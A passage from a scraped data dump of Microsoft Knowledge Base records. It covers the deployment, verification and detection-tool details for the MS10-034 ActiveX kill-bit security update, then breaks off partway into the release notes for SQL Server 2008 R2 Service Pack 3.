class=\"sbody-tr\"><td class=\"sbody-td\">/passive</td><td class=\"sbody-td\">Unattended Setup mode. No user interaction is required, but the installation status is displayed. If a restart is required at the end of Setup, a dialog box is presented to the user by using a timer warning. This warning says that the computer will restart in 30 seconds.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">/quiet</td><td class=\"sbody-td\">Quiet mode. This is the same as unattended mode, but no status or error messages are displayed.</td></tr><tr class=\"sbody-tr\"><th class=\"sbody-th\">\u00a0</th><th class=\"sbody-th\">Restart options</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">/norestart</td><td class=\"sbody-td\">Does not restart the computer when the installation has completed.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">/forcerestart</td><td class=\"sbody-td\">Restarts the computer after installation and forces other applications to close when the computer shuts down. Open files are not saved when the applications close.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">/warnrestart[:<strong class=\"sbody-strong\">x</strong>]</td><td class=\"sbody-td\">Presents a dialog box to the user together with a timer warning that the computer will restart in <strong class=\"sbody-strong\">x</strong> seconds. (The default setting is 30 seconds.) Intended for use with the /quiet switch or the /passive switch.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">/promptrestart</td><td class=\"sbody-td\">Displays a dialog box that prompts the local user to allow for a restart.</td></tr><tr class=\"sbody-tr\"><th class=\"sbody-th\">\u00a0</th><th class=\"sbody-th\">Special options</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">/overwriteoem</td><td class=\"sbody-td\">Overwrites OEM files without prompting.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">/nobackup</td><td class=\"sbody-td\">Does not back up files that are needed for uninstallation.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">/forceappsclose</td><td class=\"sbody-td\">Forces other programs to close when the computer shuts down.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">/log:<strong class=\"sbody-strong\">path</strong></td><td class=\"sbody-td\">Allows for the redirection of installation log files.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">/integrate:<strong class=\"sbody-strong\">path</strong></td><td class=\"sbody-td\">Integrates the update into the Windows source files. These files are located by using the path that is specified in the switch.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">/extract[:<strong class=\"sbody-strong\">path</strong>]</td><td class=\"sbody-td\">Extracts files, and the Setup program is not started.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">/ER</td><td class=\"sbody-td\">Enables extended error reporting.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">/verbose</td><td class=\"sbody-td\">Enables verbose logging. During installation, creates a %Windir%\\CabBuild.log. This log details the files that are copied. By using this switch, the installation may run slower.</td></tr></tbody></table></div><span class=\"text-base\">Note</span> You can combine these switches into one command. For backward compatibility, the security update also supports many of the setup switches that the earlier version of the Setup program uses.<br/><span>For more information about the supported installation switches, click the following article number to view the article in the Microsoft Knowledge Base:</span><br/>\u00a0<div class=\"indent\"><span><a href=\"https://support.microsoft.com/en-us/help/262841\" id=\"kb-link-29\">262841 </a>Command-line switches for Windows software update packages</span></div><h5 class=\"sbody-h5 text-subtitle\">Removing the update</h5>This security update supports the following setup switches.<br/>\u00a0<div class=\"table-responsive\"><table class=\"table\"><tbody><tr class=\"sbody-tr\"><th class=\"sbody-th\">Switch</th><th class=\"sbody-th\">Description</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">/help</td><td class=\"sbody-td\">Displays the command-line options.</td></tr><tr class=\"sbody-tr\"><th class=\"sbody-th\">\u00a0</th><th class=\"sbody-th\">Setup modes</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">/passive</td><td class=\"sbody-td\">Unattended Setup mode. No user interaction is required, but the installation status is displayed. If a restart is required at the end of Setup, a dialog box is presented to the user by using a timer warning. This warning says that the computer will restart in 30 seconds.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">/quiet</td><td class=\"sbody-td\">Quiet mode. This is the same as unattended mode, but no status or error messages are displayed.</td></tr><tr class=\"sbody-tr\"><th class=\"sbody-th\">\u00a0</th><th class=\"sbody-th\">Restart options</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">/norestart</td><td class=\"sbody-td\">Does not restart the computer when the installation has completed.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">/forcerestart</td><td class=\"sbody-td\">Restarts the computer after installation and forces other applications to close when the computer shuts down. Open files are not saved when the applications close.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">/warnrestart[:<strong class=\"sbody-strong\">x</strong>]</td><td class=\"sbody-td\">Presents a dialog box to the user together with a timer warning that the computer will restart in <strong class=\"sbody-strong\">x</strong> seconds. (The default setting is 30 seconds.) Intended for use with the /quiet switch or the /passive switch.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">/promptrestart</td><td class=\"sbody-td\">Displays a dialog box that prompts the local user to allow for a restart.</td></tr><tr class=\"sbody-tr\"><th class=\"sbody-th\">\u00a0</th><th class=\"sbody-th\">Special options</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">/forceappsclose</td><td class=\"sbody-td\">Forces other programs to close when the computer shuts down.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">/log:<strong class=\"sbody-strong\">path</strong></td><td class=\"sbody-td\">Allows for the redirection of installation log files.</td></tr></tbody></table></div><h5 class=\"sbody-h5 text-subtitle\">Verifying that the update was applied</h5><ul class=\"sbody-free_list\"><li><span class=\"text-base\">Microsoft Baseline Security Analyzer</span><br/><br/>To verify that a security update was applied to an affected system, you may be able to use the Microsoft Baseline Security Analyzer (MBSA) tool. See the \"Detection and deployment tools and guidance\" section for more information.</li><li><span class=\"text-base\">Registry subkey verification</span><br/><br/>You may also be able to verify the files that this security update has installed by reviewing the registry subkeys that are listed in the reference table in this section. These registry subkeys may not contain a complete list of installed files. Also, these registry subkeys may not be created correctly when an administrator or an OEM integrates or slipstreams this security update into the Windows installation source files.</li></ul><h3 class=\"sbody-h3\">Windows Vista (all versions)</h3><h4 class=\"sbody-h4\">Reference table</h4>The following table contains the security update information for this software. You can find more information in the \"Deployment information\" section.<br/>\u00a0<div class=\"table-responsive\"><table class=\"table\"><tbody><tr class=\"sbody-tr\"><th class=\"sbody-th\">Inclusion in future service packs</th><th class=\"sbody-th\">The update for this issue will be included in a future service pack or update rollup</th></tr><tr class=\"sbody-tr\"><th class=\"sbody-th\">\u00a0</th><th class=\"sbody-th\">Deployment</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Installing without requiring user intervention</td><td class=\"sbody-td\">All supported 32-bit versions of Windows Vista:<br/>Windows6.0-KB980195-x86/quiet</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">\u00a0</td><td class=\"sbody-td\">All supported 64-bit versions of Windows Vista:<br/>Windows6.0-KB980195-x64/quiet</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Installing without restarting</td><td class=\"sbody-td\">All supported 32-bit versions of Windows Vista:<br/>Windows6.0-KB980195-x86/quiet/norestart</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">\u00a0</td><td class=\"sbody-td\">All supported 64-bit versions of Windows Vista:<br/>Windows6.0-KB980195-x64/quiet/norestart</td></tr><tr class=\"sbody-tr\"><th class=\"sbody-th\">\u00a0</th><th class=\"sbody-th\">Restart requirement</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Restart required?</td><td class=\"sbody-td\">In some cases, this update does not require a restart. If a restart is required, you receive a message that advises you to restart.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Hotpatching</td><td class=\"sbody-td\">Not applicable.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Removal information</td><td class=\"sbody-td\">WUSA.exe does not support the uninstallation of updates. To uninstall an update that is installed by WUSA, open Control Panel, and then click <strong class=\"uiterm\">Security</strong>. Under <strong class=\"uiterm\">Windows Update</strong>, click <strong class=\"uiterm\">View installed updates</strong>, and then select from the list of updates.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Registry subkey verification</td><td class=\"sbody-td\">A registry subkey does not exist to validate the presence of this update.</td></tr></tbody></table></div><h4 class=\"sbody-h4\">Deployment information</h4><h5 class=\"sbody-h5 text-subtitle\">Installing the Update</h5>When you install this security update, the installer checks whether one or more of the files that are being updated on the system have previously been updated by a Microsoft hotfix.<br/><span>For more information about software update terminology, click the following article number to view the article in the Microsoft Knowledge Base:</span><br/>\u00a0<div class=\"indent\"><span><a href=\"https://support.microsoft.com/en-us/help/824684\" id=\"kb-link-30\">824684 </a> Description of the standard terminology that is used to describe Microsoft software updates</span></div>This security update supports the following setup switches.<br/>\u00a0<div class=\"table-responsive\"><table class=\"table\"><tbody><tr class=\"sbody-tr\"><th class=\"sbody-th\">\u00a0</th><th class=\"sbody-th\">Supported security update installation switches</th></tr><tr class=\"sbody-tr\"><th class=\"sbody-th\">Switch</th><th class=\"sbody-th\">Description</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">/?, /h, /help</td><td class=\"sbody-td\">Displays help on supported switches.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">/quiet</td><td class=\"sbody-td\">Suppresses the display of status or error messages.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">/norestart</td><td class=\"sbody-td\">When this switch is combined with the /quiet switch, the system is not restarted after installation even if a restart is required to complete the installation.</td></tr></tbody></table></div><span>For more information about the installer, click the following article number to view the article in the Microsoft Knowledge Base:</span><br/>\u00a0<div class=\"indent\"><span><a href=\"https://support.microsoft.com/en-us/help/934307\" id=\"kb-link-31\">934307 </a>Description of the Windows Update Stand-alone Installer (Wusa.exe) and of .msu files in Windows Vista and in Windows Server 2008</span></div><h5 class=\"sbody-h5 text-subtitle\">Verifying that the update was applied</h5>\u00a0<ul class=\"sbody-free_list\"><li><span class=\"text-base\">Microsoft Baseline Security Analyzer</span><br/><br/>To verify that a security update was applied to an affected system, you may be able to use the Microsoft Baseline Security Analyzer (MBSA) tool. See the \"Detection and deployment tools and guidance\" section for more information.</li></ul><h3 class=\"sbody-h3\">Windows Server 2008 (all versions)</h3><h4 class=\"sbody-h4\">Reference table</h4>The following table contains the security update information for this software. You can find more information in the \"Deployment information\" section.<br/>\u00a0<div class=\"table-responsive\"><table class=\"table\"><tbody><tr class=\"sbody-tr\"><th class=\"sbody-th\">Inclusion in future service packs</th><th class=\"sbody-th\">The update for this issue will be included in a future service pack or update rollup</th></tr><tr class=\"sbody-tr\"><th class=\"sbody-th\">\u00a0</th><th class=\"sbody-th\">Deployment</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Installing without requiring user intervention</td><td class=\"sbody-td\">All supported 32-bit versions of Windows Server 2008:<br/>Windows6.0-KB980195-x86/quiet</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">\u00a0</td><td class=\"sbody-td\">All supported 64-bit versions of Windows Server 2008:<br/>Windows6.0-KB980195-x64/quiet</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">\u00a0</td><td class=\"sbody-td\">All supported Itanium-based versions of Windows Server 2008:<br/>Windows6.0-KB980195-ia64/quiet</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Installing without restarting</td><td class=\"sbody-td\">All supported 32-bit versions of Windows Server 2008:<br/>Windows6.0-KB980195-x86/quiet/norestart</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">\u00a0</td><td class=\"sbody-td\">All supported 64-bit versions of Windows Server 2008:<br/>Windows6.0-KB980195-x64/quiet/norestart</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">\u00a0</td><td class=\"sbody-td\">All supported Itanium-based versions of Windows Server 2008:<br/>Windows6.0-KB980195-ia64/quiet/norestart</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">More information</td><td class=\"sbody-td\">See the \"Detection and deployment tools and guidance\" section.</td></tr><tr class=\"sbody-tr\"><th class=\"sbody-th\">\u00a0</th><th class=\"sbody-th\">Restart requirement</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Restart required?</td><td class=\"sbody-td\">In some cases, this update does not require a restart. If a restart is required, you receive a message that advises you to restart.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Hotpatching</td><td class=\"sbody-td\">Not applicable.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Removal information</td><td class=\"sbody-td\">WUSA.exe does not support the uninstallation of updates. To uninstall an update that is installed by WUSA, open Control Panel, and then click <strong class=\"uiterm\">Security</strong>. Under <strong class=\"uiterm\">Windows Update</strong>, click <strong class=\"uiterm\">View installed updates</strong>, and then select from the list of updates.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Registry subkey verification</td><td class=\"sbody-td\">A registry subkey does not exist to validate the presence of this update.</td></tr></tbody></table></div><h4 class=\"sbody-h4\">Deployment information</h4><h5 class=\"sbody-h5 text-subtitle\">Installing the Update</h5>When you install this security update, the installer checks whether one or more of the files that are being updated on the system have previously been updated by a Microsoft hotfix.<br/><span>For more information about software update terminology, click the following article number to view the article in the Microsoft Knowledge Base:</span><br/>\u00a0<div class=\"indent\"><span><a href=\"https://support.microsoft.com/en-us/help/824684\" id=\"kb-link-32\">824684 </a> Description of the standard terminology that is used to describe Microsoft software updates</span></div>This security update supports the following setup switches:<br/>\u00a0<div class=\"table-responsive\"><table class=\"table\"><tbody><tr class=\"sbody-tr\"><th class=\"sbody-th\">Switch</th><th class=\"sbody-th\">Description</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">/?, /h, /help</td><td class=\"sbody-td\">Displays help on supported switches.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">/quiet</td><td class=\"sbody-td\">Suppresses the display of status or error messages.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">/norestart</td><td class=\"sbody-td\">When you combine this switch with the /quiet switch, the system is not restarted after installation even if a restart is required to complete installation.</td></tr></tbody></table></div><span>For more information about this issue, click the following article number to view the article in the Microsoft Knowledge Base:</span><br/>\u00a0<div class=\"indent\"><span><a href=\"https://support.microsoft.com/en-us/help/934307\" id=\"kb-link-33\">934307 </a>Description of the Windows Update Stand-alone Installer (Wusa.exe) and of .msu files in Windows Vista and in Windows Server 2008</span></div><h5 class=\"sbody-h5 text-subtitle\">Verifying that the update was applied</h5><br/><span class=\"text-base\">Microsoft Baseline Security Analyzer</span><br/><br/>To verify that a security update was applied to an affected system, you may be able to use the Microsoft Baseline Security Analyzer (MBSA) tool. See the \"Detection and deployment tools and guidance\" section for more information.<br/><br/>\u00a0<h3 class=\"sbody-h3\">Detection and deployment tools and guidance</h3>This section describes how to manage the software and security updates that you have to deploy to the servers, to the desktop computers, and to the mobile computers in your organization. For more information, visit the following Microsoft TechNet Update Management Center webpage:<div class=\"indent\"><a href=\"http://technet.microsoft.com/en-us/updatemanagement/default.aspx\" id=\"kb-link-34\" target=\"_self\">http://technet.microsoft.com/en-us/updatemanagement/default.aspx</a></div>For more information about security in Microsoft products, visit the following Microsoft TechNet Security webpage:<div class=\"indent\"><a href=\"http://technet.microsoft.com/en-us/security/default.aspx\" id=\"kb-link-35\" target=\"_self\">http://technet.microsoft.com/en-us/security/default.aspx</a></div>Security updates are available from Microsoft Update, Windows Update, and Office Update. Security updates are also available at the Microsoft Download Center. You can find them most easily by doing a keyword search for \"security update.\"<br/><br/>Finally, security updates can be downloaded from the Microsoft Update Catalog. For more information, visit the following Microsoft webpage:<div class=\"indent\"><a href=\"http://catalog.update.microsoft.com/v7/site/home.aspx\" id=\"kb-link-36\" target=\"_self\">http://catalog.update.microsoft.com/v7/site/Home.aspx</a></div>The Microsoft Update Catalog provides a catalog of content that is searchable and that is available through Windows Update and through Microsoft Update. This content includes security updates, drivers, and service packs. By using a security bulletin number such as \"MS08-010\" for your search, you can add all the applicable updates to your basket. You can also add different languages for an update to your basket, and you can download the content to any folder that you want. For more information about the Microsoft Update Catalog, visit the following Microsoft Update Catalog FAQ webpage:<div class=\"indent\"><a href=\"http://catalog.update.microsoft.com/v7/site/faq.aspx\" id=\"kb-link-37\" target=\"_self\">http://catalog.update.microsoft.com/v7/site/faq.aspx</a></div><h4 class=\"sbody-h4\">Detection and deployment guidance</h4>Microsoft has provided detection and deployment guidance for this month's security updates. This guidance will also help IT professionals understand how they can use various tools to help deploy the security update. These tools include Windows Update, Microsoft Update, Office Update, the Microsoft Baseline Security Analyzer (MBSA), the Office Detection Tool, Microsoft Systems Management Server (SMS), and the Extended Security Update Inventory Tool.<br/><span>For more information, click the following article number to view the article in the Microsoft Knowledge Base:</span><br/>\u00a0<div class=\"indent\"><span><a href=\"https://support.microsoft.com/en-us/help/910723\" id=\"kb-link-38\">910723 </a>Summary list of monthly detection and deployment guidance articles</span></div><h4 class=\"sbody-h4\">Microsoft Baseline Security Analyzer</h4>Microsoft Baseline Security Analyzer (MBSA) lets administrators scan local and remote systems for missing security updates. The Microsoft Baseline Security Analyzer can also identify common security misconfigurations. For more information, visit the following Microsoft Baseline Security Analyzer webpage:<div class=\"indent\"><a href=\"http://technet.microsoft.com/en-us/security/cc184924.aspx\" id=\"kb-link-39\" target=\"_self\">http://technet.microsoft.com/en-us/security/cc184924.aspx</a></div>The following table provides the MBSA detection summary for this security update.<div class=\"table-responsive\"><table class=\"table\"><tbody><tr class=\"sbody-tr\"><th class=\"sbody-th\">Software</th><th class=\"sbody-th\">MBSA 2.1</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows 2000 with Service Pack 4</td><td class=\"sbody-td\">Yes</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows XP Service Pack 2 and Windows XP Service Pack 3</td><td class=\"sbody-td\">Yes</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows XP Professional and Windows XP Professional Service Pack 2, x64-based versions</td><td class=\"sbody-td\">Yes</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows Server 2003 Service Pack 1 and Windows Server 2003 Service Pack 2</td><td class=\"sbody-td\">Yes</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows Server 2003 and Windows Server 2003 Service Pack 2, x64-based versions</td><td class=\"sbody-td\">Yes</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows Server 2003 with SP1 for Itanium-based systems and Windows Server 2003 with SP2 for Itanium-based systems</td><td class=\"sbody-td\">Yes</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows Vista and Windows Vista Service Pack 1</td><td class=\"sbody-td\">Yes</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows Vista and Windows Vista Service Pack 1, 64-bit versions</td><td class=\"sbody-td\">Yes</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows Server 2008 for 32-bit systems</td><td class=\"sbody-td\">Yes</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows Server 2008 for 64-bit systems</td><td class=\"sbody-td\">Yes</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows Server 2008 for Itanium-based systems</td><td class=\"sbody-td\">Yes</td></tr></tbody></table></div>For more information about MBSA 2.1, visit the following Microsoft MBSA 2.1 Frequently Asked Questions webpage:<div class=\"indent\"><a href=\"http://technet.microsoft.com/en-us/security/cc184922.aspx\" id=\"kb-link-40\" target=\"_self\">http://technet.microsoft.com/en-us/security/cc184922.aspx</a></div><h4 class=\"sbody-h4\">Windows Server Update Services</h4>By using Windows Server Update Services (WSUS), administrators can deploy the latest critical updates and security updates for Windows 2000 operating systems and later versions, for Microsoft Office XP and later versions, for Microsoft Exchange Server 2003, and for Microsoft SQL Server 2000 and later versions. For more information about how to deploy this security update by using Windows Server Update Services, visit the following Microsoft Windows Server Update Services Product Overview webpage:<div class=\"indent\"><a href=\"http://technet.microsoft.com/en-us/wsus/bb466208.aspx\" id=\"kb-link-41\" target=\"_self\">http://technet.microsoft.com/en-us/wsus/bb466208.aspx</a></div><h4 class=\"sbody-h4\">Systems Management Server</h4>The following table provides the SMS detection and deployment summary for this security update.<br/>\u00a0<div class=\"table-responsive\"><table class=\"table\"><tbody><tr class=\"sbody-tr\"><th class=\"sbody-th\">Software</th><th class=\"sbody-th\">SMS 2.0</th><th class=\"sbody-th\">SMS 2003 with SUSFP</th><th class=\"sbody-th\">SMS 2003 with ITMU</th><th class=\"sbody-th\">Configuration Manager 2007</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows 2000 with Service Pack 4</td><td class=\"sbody-td\">Yes</td><td class=\"sbody-td\">Yes</td><td class=\"sbody-td\">Yes</td><td class=\"sbody-td\">Yes</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows XP Service Pack 2 and Windows XP Service Pack 3</td><td class=\"sbody-td\">Yes</td><td class=\"sbody-td\">Yes</td><td class=\"sbody-td\">Yes</td><td class=\"sbody-td\">Yes</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows XP Professional and Windows XP Professional Service Pack 2, x64-based versions</td><td class=\"sbody-td\">No</td><td class=\"sbody-td\">No</td><td class=\"sbody-td\">Yes</td><td class=\"sbody-td\">Yes</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows Server 2003 Service Pack 1 and Windows Server 2003 Service Pack 2</td><td class=\"sbody-td\">Yes</td><td class=\"sbody-td\">Yes</td><td class=\"sbody-td\">Yes</td><td class=\"sbody-td\">Yes</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows Server 2003 and Windows Server 2003 Service Pack 2, x64-based versions</td><td class=\"sbody-td\">No</td><td class=\"sbody-td\">No</td><td class=\"sbody-td\">Yes</td><td class=\"sbody-td\">Yes</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows Server 2003 with SP1 for Itanium-based systems and Windows Server 2003 with SP2 for Itanium-based systems</td><td class=\"sbody-td\">No</td><td class=\"sbody-td\">No</td><td class=\"sbody-td\">Yes</td><td class=\"sbody-td\">Yes</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows Vista and Windows Vista Service Pack 1</td><td class=\"sbody-td\">No</td><td class=\"sbody-td\">No</td><td class=\"sbody-td\">See the \"Note for Windows Vista and for Windows Server 2008\" section later in this article</td><td class=\"sbody-td\">Yes</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows Vista and Windows Vista Service Pack 1, 64-bit versions</td><td class=\"sbody-td\">No</td><td class=\"sbody-td\">No</td><td class=\"sbody-td\">See the \"Note for Windows Vista and for Windows Server 2008\" section later in this article</td><td class=\"sbody-td\">Yes</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows Server 2008 for 32-bit systems</td><td class=\"sbody-td\">No</td><td class=\"sbody-td\">No</td><td class=\"sbody-td\">See the \"Note for Windows Vista and for Windows Server 2008\" section later in this article</td><td class=\"sbody-td\">Yes</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows Server 2008 for 64-bit systems</td><td class=\"sbody-td\">No</td><td class=\"sbody-td\">No</td><td class=\"sbody-td\">See the \"Note for Windows Vista and for Windows Server 2008\" section later in this article</td><td class=\"sbody-td\">Yes</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows Server 2008 for Itanium-based systems</td><td class=\"sbody-td\">No</td><td class=\"sbody-td\">No</td><td class=\"sbody-td\">See the \"Note for Windows Vista and for Windows Server 2008\" section later in this article</td><td class=\"sbody-td\">Yes</td></tr></tbody></table></div>For SMS 2.0 and for SMS 2003, the SMS SUS Feature Pack (SUSFP) that includes the Security Update Inventory Tool (SUIT) can be used by SMS to detect security updates. For more information, visit the following Microsoft webpage for Downloads for Systems Management Server 2.0:<div class=\"indent\"><a href=\"http://technet.microsoft.com/en-us/sms/bb676799.aspx\" id=\"kb-link-42\" target=\"_self\">http://technet.microsoft.com/en-us/sms/bb676799.aspx</a></div>For SMS 2003, the SMS 2003 Inventory Tool for Microsoft Updates (ITMU) can be used by SMS to detect security updates that are offered by Microsoft Update and that are supported by Windows Server Update Services. For more information about the SMS 2003 ITMU, visit the following Microsoft webpage for SMS 2003 Inventory Tool for Microsoft Updates:<div class=\"indent\"><a href=\"http://technet.microsoft.com/en-us/sms/bb676783.aspx\" id=\"kb-link-43\" target=\"_self\">http://technet.microsoft.com/en-us/sms/bb676783.aspx</a></div>SMS 2003 can also use the Microsoft Office Inventory Tool to detect required updates for Microsoft Office applications. For more information, visit the following Microsoft webpages:<ul class=\"sbody-free_list\"><li>Systems Management Server 2003 Software Update Scanning Tools<br/>\u00a0<div class=\"indent\"><a href=\"http://technet.microsoft.com/en-us/sms/bb676786.aspx\" id=\"kb-link-44\" target=\"_self\">http://technet.microsoft.com/en-us/sms/bb676786.aspx</a></div></li><li>Downloads for Systems Management Server 2003<br/>\u00a0<div class=\"indent\"><a href=\"http://technet.microsoft.com/en-us/sms/bb676766.aspx\" id=\"kb-link-45\" target=\"_self\">http://technet.microsoft.com/en-us/sms/bb676766.aspx</a></div></li></ul>System Center Configuration Manager (Configuration Manager 2007) 2007 uses WSUS 3.0 for detection of updates. For more information about Configuration Manager 2007 Software Update Management, visit the following Microsoft webpage:<div class=\"indent\"><a href=\"http://technet.microsoft.com/en-us/library/bb735860.aspx\" id=\"kb-link-46\" target=\"_self\">http://technet.microsoft.com/en-us/library/bb735860.aspx</a></div><span class=\"text-base\">Note for Windows Vista and for Windows Server 2008</span><br/><br/>Microsoft Systems Management Server 2003 with Service Pack 3 includes support for Windows Vista and for Windows Server 2008. For more information about SMS, visit the following Microsoft SMS webpage:<div class=\"indent\"><a href=\"http://www.microsoft.com/smserver/default.mspx\" id=\"kb-link-47\" target=\"_self\">http://www.microsoft.com/smserver/default.mspx</a></div><span>For more information about detection and deployment guidance articles, click the following article number to view the article in the Microsoft Knowledge Base:</span><br/>\u00a0<div class=\"indent\"><span><a href=\"https://support.microsoft.com/en-us/help/910723\" id=\"kb-link-48\">910723 </a>Summary list of monthly detection and deployment guidance articles</span></div></div></body></html>", "modified": "2020-05-21T04:15:59", "id": "KB980195", "href": "https://support.microsoft.com/en-us/help/980195/", "published": "2020-05-21T04:15:39", "title": "MS10-034: Cumulative security update of ActiveX kill bits", "type": "mskb", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-05-21T10:34:50", "bulletinFamily": "microsoft", "description": "<html><body><p>Describes SQL Server 2008 R2 Service Pack 3 release information.</p><h2>Summary</h2><div class=\"kb-summary-section section\">This article contains important information to read before you install Microsoft SQL Server 2008 R2 Service Pack 3 (SP3). It describes how to obtain the service pack, the list of fixes included in the service pack, how to select the correct download based on your currently installed version, and a list of copyright attributions for the product.<br/><br/><span class=\"text-base\">Note </span>This article serves as a single source of information for finding all documentation related to this service pack. It includes all the information that you previously used to find in the Release notes and Readme.txt files.<br/><br/> </div><h2>More Information</h2><div class=\"kb-moreinformation-section section\"><h3 class=\"sbody-h3\">How to obtain SQL Server 2008 R2 SP3</h3>SQL Server 2008 R2 SP3 is available for download at the <a href=\"http://go.microsoft.com/fwlink/?linkid=512818&amp;clcid=0x409\" id=\"kb-link-1\" target=\"_self\">SQL Server 2008 R2 SP3 download page</a>. You can download SQL Server 2008 R2 SP3 Feature Pack <a href=\"http://go.microsoft.com/fwlink/?linkid=512819&amp;clcid=0x409\" id=\"kb-link-2\" target=\"_self\">here</a>.<h3 class=\"sbody-h3\">List of fixes included in SQL Server 2008 R2 SP3</h3>Microsoft SQL Server 2008 R2 service packs are cumulative updates and SQL Server 2008 R2 SP3 upgrades all editions and service levels of SQL Server 2008 R2 to SQL Server 2008 R2 SP3.<br/><br/>This service pack contains fixes from all Cumulative Updates that were released since SP2 for SQL Server 2008 R2. For a full list of fixes from various cumulative updates since SP2, click the following article number to view the article in the Microsoft Knowledge Base. <div class=\"indent\"><span><a href=\"https://support.microsoft.com/en-us/help/2730301\" id=\"kb-link-3\">2730301 </a> The SQL Server 2008 R2 builds that were released after SQL Server 2008 R2 Service Pack 2 was released </span></div>In addition to the Cumulative Update fixes, this service pack also includes the following fixes.<br/><br/><br/>\u00a0<div class=\"table-responsive\"><table class=\"table\"><tbody><tr class=\"sbody-tr\"><th class=\"sbody-th\">VSTS Bug</th><th class=\"sbody-th\">KB article number</th><th class=\"sbody-th\">Description</th><th class=\"sbody-th\">Fix area</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">2976923</td><td class=\"sbody-td\"><a href=\"https://support.microsoft.com/en-us/help/2994310\" id=\"kb-link-4\">2994310 </a></td><td class=\"sbody-td\">FIX: Distribution Agent for Oracle subscription fails when you use SQL Server 2008 R2 or SQL Server 2008</td><td class=\"sbody-td\">SQL service</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\"><a href=\"https://support.microsoft.com/en-us/help/2984340\" id=\"kb-link-5\">2984340 </a></td><td class=\"sbody-td\">MS14-044: Vulnerabilities in SQL Server could allow elevation of privilege: August 12, 2014</td><td class=\"sbody-td\">SQL service</td></tr></tbody></table></div><h3 class=\"sbody-h3\">Select the correct file to download and install</h3>The SQL Server 2008 R2 SP3 download page contains the system requirements for installing SQL Server 2008 R2 SP3 and basic installation instructions. For additional documentation about how to upgrade installed SQL Server 2008 R2 components with a SQL Server 2008 R2 servicing update, see <a href=\"http://msdn.microsoft.com/library/dd631803(sql.10).aspx\" id=\"kb-link-6\" target=\"_self\">SQL Server 2008 R2 Servicing Documentation</a>.<br/><br/>For more information about how to install SQL Server 2008 R2, see <a href=\"http://go.microsoft.com/fwlink/?linkid=154143\" id=\"kb-link-7\" target=\"_self\">SQL Server 2008 R2 